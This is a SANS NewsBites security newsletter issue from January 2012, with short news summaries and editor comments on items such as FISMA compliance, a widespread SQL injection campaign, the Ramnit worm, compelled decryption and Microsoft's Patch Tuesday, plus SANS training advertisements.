Interactive Courses + Cyber Defense NetWars Available During SANS Scottsdale: Virtual Edition 2021. Save $300 thru 1/27.

Newsletters: NewsBites

Subscribe to SANS Newsletters

Join the SANS Community to receive the latest curated cyber security news, vulnerabilities and mitigations, training opportunities, and our webcast schedule.

SANS NewsBites
@Risk: Security Alert
OUCH! Security Awareness
Case Leads DFIR Digest
Industrial Control Systems
Industrials & Infrastructure

SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.

Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.

Volume XIV - Issue #2

January 06, 2012


Federal Agencies Don't Expect to Meet FISMA Continuous Monitoring Deadline
SQL Injection Attack Spreads
Federal Judge Says No Warrant Needed for GPS Tracking


Pastebin Recovering from DDoS Attack
Federal Prosecutors Seek Order to Force Colorado Woman to Decrypt Computer
Apple Tackling Pirated Apps
Malware Infection Results in Retrial for Man Convicted of Murder
Ramnit Worm Stealing Facebook Login Credentials
Israeli Credit Card Data Stolen, Posted to Internet
Microsoft Sues Company for Allegedly Selling Counterfeit Windows Recovery CDs
First Microsoft Patch Tuesday of 2012 to Address Eight Flaws
Hands-On Learning Serves Information Security Education Well

********************** SPONSORED BY Palo Alto Networks ******************

Palo Alto Networks Recognized as a Leader in the Gartner Magic Quadrant for Enterprise Network Firewalls. According to Gartner, vendors in the leaders quadrant "lead the market in offering new safeguarding features, providing expert capability, rather than treating the firewall as a commodity, and having a good track record of avoiding vulnerabilities in their security products."



--SANS Security East 2012, New Orleans, LA January 17-26, 2012 11 courses. Bonus evening presentations include Advanced VoIP PenTesting: Current Threats and Methods; and Helping Small Businesses with Security.

--SANS North American SCADA 2012, Lake Buena Vista, FL January 21-29, 2012 Gain the most current information regarding SCADA and Control System threats and learn how to best prepare to defend against them. Hear what works and what doesn't from peer organizations. Network with top individuals in the field of SCADA security. Return from the summit with solutions that you can immediately put to use in your organization. Pre-Summit courses: January 21-25, 2012 Summit: January 26-27, 2012 Post-Summit Courses: January 28-29, 2012

--SANS Monterey 2012, Monterey, CA January 30-February 4, 2012 6 courses. Bonus evening presentations include Who Do You Trust? SSL and TLS Under Attack; and IOS Programming Demo.

--SANS Phoenix 2012, Phoenix, AZ February 13-18, 2012 7 courses. Bonus evening presentations include Desktop Betrayal: Exploiting Clients Through the Features They Demand; and Windows Exploratory Surgery with Process Hacker.

--SANS Secure Singapore 2012, Singapore, Singapore March 5-17, 2012 5 courses. Bonus evening presentations include Introduction to Windows Memory Analysis; and Why Our Defenses are Failing Us: One Click is All It Takes ...

--SANS 2012, Orlando, FL March 23-39, 2012 42 courses. Bonus evening presentations include Exploiting Vulnerabilities: 60 Minutes from Discovery to Exploit; Evolving Threats; and Harbinger of Evil: The Forensic Art of Finding Malware.

--Looking for training in your own community?

Save on On-Demand training (30 full courses) - See samples at

Plus Atlanta, Bangalore, San Francisco, Stuttgart, and Nashville, all in the next 90 days. For a list of all upcoming events, on-line and live: ************************************************************************


Federal Agencies Don't Expect to Meet FISMA Continuous Monitoring Deadline (January 3, 2012)

A survey of US federal agencies found that fewer than half expect to be compliant with Federal Information Security Management Act (FISMA) continuous monitoring requirements by the September 2012 deadline. While respondents feel that the move will help improve security overall, bringing about the changes to meet the requirements is proving to be difficult. Agencies need to find ways to bring together information from various systems to provide the necessary set of data. Many agencies lack the necessary overview of their IT environments to implement the technology.

[Editor's Note (Pescatore): Continuous monitoring and reporting (and other changes in 800-53 rev 3) was an enormous unfunded mandate for most government agencies. A few agencies were able to increase staff and funds, but most could not - or at least did not. FY 2012 budgets are in even worse turmoil - rev 3 deficiencies overall will likely carry well into FY2013.
(Paller): It's never been about the money. Ever since both Senate and House hearings and White House leadership have called upon agencies to replace C&A reporting with continuous monitoring and mitigation, two barriers have consistently blocked broad adoption: (1) the contractors who are earning $350 million every year writing out-of-date and unread security reports for certification and accreditation updates, and who don't want to give up that money even though they know they are wasting federal funds, and (2) the IGs who give the contractors cover because they don't know how to, and have not tried to measure continuous monitoring and mitigation systems. A phone call I had with the IG from a major agency this week says that the second barrier is falling across several agencies. There is more than enough money wasted in C&A report writing to fully fund continuous monitoring and mitigation. ]

SQL Injection Attack Spreads (January 4 & 5, 2012)

An SQL injection attack appears to have infected more than 1 million URLs. Some say the reported number of infections may be inflated, as the counts may include pages discussing the attack, although the number of infected URLs was significantly smaller in early December 2011. The malware is called lilupophilupop. The attack appears to be partly automated and partly manual. The .NL domain (the Netherlands) has the greatest number of infections. Internet Storm Center:

[Editor's Note (Murray): Unchecked Inputs continues to be the most wide-spread vulnerability having now surpassed default passwords. SQL-injection attacks are at least among the top three in frequency and success. I wish checking inputs was easy; it isn't. However, using the OWASP Enterprise Security API Library is easy. ]

Federal Judge Says No Warrant Needed for GPS Tracking (January 3, 2012)

A US federal judge in Missouri has ruled that a warrant was not needed for the FBI to surreptitiously affix a GPS device to a suspect's automobile to track his location for two months. The defendant, Fred Robinson, was accused of falsifying his time sheets while employed at the city of St. Louis. Magistrate David Noce wrote in his ruling that Robinson had no reasonable expectation of privacy. The GPS device revealed the location of the suspect's vehicle, but nothing more. "Under these circumstances
[set forth in the ruling ]
, installation of the GPS tracker device was not a search within the meaning of the Fourth Amendment." The US Supreme Court is expected to rule on an unrelated case regarding the same issue in the next few months.
[Editor's Note (Pescatore): I've lost track of the precedent cases from back in the day, but with the old vehicle tracking systems used in the pre-GPS 1980s we were able to attach them and monitor them without a warrant - as long as we did not use the vehicle's power or anything else existing in the vehicle. I'm sure this distinction will come up soon as so many cars are coming with GPS built into them.
(Liston): I don't see that there is much difference between slapping a GPS tracker on a car and simply assigning a beat-cop to "tail" a suspect. Actually, it seems *less* invasive, because if you get out of your car and *walk* somewhere, the GPS doesn't know it. ]

************************** SPONSORED LINK ****************************

1) Take the SANS 8th Annual Log and Event Management Survey Be a part of this industry leading survey and be entered to WIN a $250 American Express Card.

2) What devices are accessing what resources and by whom? Take the SANS first annual mobility survey and be entered to win a $250 American Express Card Giveaway when results are announced in late March at SANS 2012!
Follow this link to the survey:



Pastebin Recovering from DDoS Attack (January 4, 2012) is back online after a distributed denial-of-service (DDoS) attack hit the file sharing service earlier this week. The site has been used by the loosely organized hacking collective known as Anonymous to post information stolen in their exploits and to announce plans for future attacks. Though Pastebin has been used by Anonymous, however, there is no evidence of a connection between the attack and the use of the site by Anonymous.
[Editor's Note (Pescatore): Global warming has tended to cause more extremes in weather resulting in more power outages, pointing out the wisdom of having backup power for business critical services. Now, I tend to doubt that the growth in DDoS attacks can really be blamed on global climate change, but the growth is there - pointing out the need for making sure Internet connectivity is as reliable as electrical power. ]

Federal Prosecutors Seek Order to Force Colorado Woman to Decrypt Computer (January 4, 2012)

Federal prosecutors in Denver, Colorado are seeking a court order that would force Ramona Fricosu to enter the password to decrypt her laptop computer. They believe that the machine contains evidence that would help convict Fricosu and her former husband in a bank fraud case. The pair was allegedly involved in a complex mortgage fraud scheme that stole more than US $900,000 from banks in the Colorado Springs area. Prosecutors say that Fricosu does not have to divulge her password; she can enter the password without it being noted as long as they eventually gain access to the information on the computer.

[Editor's Note (Murray): The court is entitled to the best evidence. It cannot force one to make a record. However, once a record is made, one may not conceal it from the court. The intent of the 5th amendment was to prevent "witch trials," the conviction of one on only their own coerced testimony. The written or electronic record, on the other hand, says what it says.

Apple Tackling Pirated Apps (January 4, 2012)

Apple is taking steps to thwart the availability of pirated applications for the company's devices. By sending Digital Millennium Copyright Act (DMCA) takedown notices to Apptrackr, Apple hopes to cut off access to the pirated apps. In response, Apptrackr has moved its server outside of the US and has deployed technology that does not use direct links to the applications. The developer of Apptrackr claims his site is designed to allow users to test apps before they buy them, but admits that it is often used by people who never intend to purchase the apps.

[Editor's Note (Murray): Apple is defending the right of everyman to at least one orderly computing environment. Steve Jobs, if he were still with us, might say, "If you want pirated software, if you want porn, if you want leakage from and contamination of your devices, get an Android." ]

Malware Infection Results in Retrial for Man Convicted of Murder (January 1 & 5, 2012)

A Florida man who was convicted of second degree murder will get a new trial because a computer virus destroyed transcripts of the court proceedings. Normally, court stenographers make both paper and electronic records to proceedings, but in this case, the stenographer did not bring enough paper and recorded the proceedings only digitally. The digital records were then transcribed onto her own personal computer and deleted from the stenograph. Her PC then became infected with a computer virus resulting in the loss of the court records. Randy Chaviano's legal team filed an appeal after he was given a life sentence in July 2009; because the transcripts of the trial were incomplete, the Third District Court of Appeals ordered that Chaviano be granted a new trial. The stenographer involved has been subsequently fired.

Ramnit Worm Stealing Facebook Login Credentials (January 5, 2012)

A worm known as Ramnit is stealing Facebook login credentials. The malware infects Windows executables, Microsoft Office, and HTML files and has the capacity to be used as a backdoor, allowing attackers to take further action on compromised machines. A Ramnit command and control server containing sets of login credentials for 45,000 Facebook accounts has been found. Most of the users affected appear to be from the UK and France.


Israeli Credit Card Data Stolen, Posted to Internet (January 3 & 4, 2012)

A group in Saudi Arabia, believed to have ties to the Anonymous hacking group, has stolen Israeli credit card account data and posted them to the Internet. The group claimed to have compromised 400,000 card accounts, but an Israeli credit card company said that most of the data were invalid or incorrect, and that the number of exposed accounts was much lower. Israeli banks have frozen the compromised accounts, which are believed to number about 14,000. Most of the stolen data appear to have been taken from a sports website,


Microsoft Sues Company for Allegedly Selling Counterfeit Windows Recovery CDs (January 4, 2012)

Microsoft is suing UK company Comet for allegedly selling counterfeit copies of Windows Vista and Windows XP recovery disks. Comet has countered with a statement saying that they were acting in their customers' best interests because users of Microsoft products were "adversely affected by the
[software company's ]
decision to stop supplying recovery disks with each new Microsoft operating system based computer." Microsoft responded by saying that the PCs' hard drives already contained recovery software and that Comet sold disks for GBP 14.99 (US $23.24) that Microsoft would have provided at a much lower cost or even at no cost at all. Comet has about 250 stores in the UK.


First Microsoft Patch Tuesday of 2012 to Address Eight Flaws (January 5, 2012)

On Tuesday, January 10, 2012, Microsoft plans to issue seven security bulletins that address a total of eight flaws. The vulnerabilities affect Microsoft Windows and Microsoft Developer Tools and Software. Just one of the bulletins carries a maximum severity rating of critical; the other six have severity ratings of important. All currently supported versions of Windows are affected by flaws fixed in the January 2012 update. One of the vulnerability impacts is listed as "secure feature bypass," a term that has not been used before in this context. Microsoft declined to say whether it will be issuing a fix for the SSL/TLS vulnerability; the company had planned to fix that flaw in December 2011, but pulled the patch at the last minute due to compatibility issues with SAP. Internet Storm Center:



Hands-On Learning Serves Information Security Education Well (January 3, 2012)

Although jobs in information security are more stable than those in most other sectors, fewer students are pursuing STEM (science, technology, engineering, and math) majors in college. Some of the reluctance to pursue STEM majors may arise from the assumption that information security jobs will be outsourced or from a lack of strong foundation at the high school level; in addition, colleges often neglect providing STEM students with valuable research opportunities. Many colleges toss security in with general computer science; it is rare that security is taught as a specialty at the college level. But that is beginning to change. Alex Levinson, who is now a security software engineer at Zynga, spoke to the value of hands on experience and learning, noting that "doing simulation, competition, and application of skill in a live environment is a really good indicator of where their skill set is at, where their talent lies." Levinson participated in the National Collegiate Cyber Defense Competition and did well enough to earn a spot in the US Cyber Challenge, where he and his team took first place. But even after people have acquired the skills necessary to be effective cyber security professionals, placement can be difficult because companies have trouble articulating what it is they need. An initiative led by the Federal Office of Personnel Management aims to develop a taxonomy for cyber security professionals to help address that problem.


The Editorial Board of SANS NewsBites

John Pescatore is Vice President at Gartner Inc.; he has worked in computer and network security since 1978.

Stephen Northcutt founded the GIAC certification and is President of STI, The Premier Skills-Based Cyber Security Graduate School,

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.

Ed Skoudis is co-founder of InGuardians, a security research and consulting firm, and author and lead instructor of the SANS Hacker Exploits and Incident Handling course.

William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.

Rob Lee is the curriculum lead instructor for the SANS Institute's computer forensic courses ( and a Director at the incident response company Mandiant.

Rohit Dhamankar is a security professional currently involved in independent security research.

Tom Liston is a Senior Security Consultant and Malware Analyst for InGuardians, a handler for the SANS Institute's Internet Storm Center, and co-author of the book Counter Hack Reloaded.

Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.

Ron Dick directed the National Infrastructure Protection Center (NIPC) at the FBI and served as President of the InfraGard National Members Alliance - with more than 22,000 members.

Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He is leading SANS' global initiative to improve application security.

David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.

Alan Paller is director of research at the SANS Institute.

Marcus J. Ranum built the first firewall for the White House and is widely recognized as a security products designer and industry innovator.

Clint Kreitner is the founding President and CEO of The Center for Internet Security.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS infrastructure manager and serves as production manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit